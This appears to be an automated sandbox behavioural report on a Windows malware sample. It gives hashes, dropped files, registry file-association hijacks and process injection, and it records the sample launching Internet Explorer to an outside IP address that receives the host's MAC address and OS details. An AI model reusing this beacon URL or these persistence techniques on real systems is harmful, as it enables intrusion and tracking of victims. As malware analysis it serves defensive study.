Analysis
-
max time kernel
185s -
max time network
198s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
07-11-2022 18:09
Behavioral task
behavioral1
Sample
c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe
Resource
win10v2004-20220812-en
General
-
Target
c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe
-
Size
143KB
-
MD5
021dcfa7a9bc93f89ece268b3b0a71e8
-
SHA1
1592e371e4ae9dda35eaf1bc107eca55efb71aea
-
SHA256
c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627
-
SHA512
44007a0e23d8ecde79d40481a8afcb000f3817f06854ab83e923e863a3d18d5198cc12c9d1ee40897ffa4429104d75d25456ac5c4fa71288cdef8163ab735de2
-
SSDEEP
3072:MgN+Ns5uUdzh5vaBAzmeu2ZN3PRp6hIAsdxn6sM0TZMl9V:ZN+quUdzh5vaBAz5NZkhIAsdxn6sM0Tc
Malware Config
Signatures
-
resource yara_rule behavioral1/memory/1732-55-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/1732-56-0x0000000000400000-0x0000000000426000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Thunder\Update.exe c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe File opened for modification C:\Program Files\Thunder\Update.exe c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\WINDOWS\Downloaded Program Files\Update.exe c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Frist c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B3574CE1-5F65-11ED-A34F-EA25B6F29539} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "374677584" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine\ = "JScript.Encode" c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico" c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command\ = "C:\\Program Files\\Thunder\\Update.exe \"%1\" %*" c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine\ = "JScript.Encode" c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1536 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1536 iexplore.exe 1536 iexplore.exe 432 IEXPLORE.EXE 432 IEXPLORE.EXE 432 IEXPLORE.EXE 432 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1732 wrote to memory of 1536 1732 c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe 28 PID 1732 wrote to memory of 1536 1732 c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe 28 PID 1732 wrote to memory of 1536 1732 c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe 28 PID 1732 wrote to memory of 1536 1732 c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe 28 PID 1536 wrote to memory of 432 1536 iexplore.exe 30 PID 1536 wrote to memory of 432 1536 iexplore.exe 30 PID 1536 wrote to memory of 432 1536 iexplore.exe 30 PID 1536 wrote to memory of 432 1536 iexplore.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe"C:\Users\Admin\AppData\Local\Temp\c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea5627.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=ea-25-b6-f2-95-39&os=Microsoft Windows XP&flag=a6c815ea9033f67796aa256db98faf12&user=c5ef450c34cac67c2d34ec5450011324b971bcfa6e26041faeec52372fea56272⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1536 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:432
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
608B
MD575a20bd275e0fe7c10d6965811d08ed4
SHA1a4932148cdf1cb676867c85693db4fdf57adf423
SHA256cac64c157a5e2becee6ec9cc158a4a2266a4073e8d573429e8c7b5b9fddc243f
SHA512159782a581dd097abb975b0a04b1dea28b86375ab818a997e0c74de9fc527861fe05d33d121dc18b803a3a93c22c9f353e8e0a3ae841b95be5357b768b43d860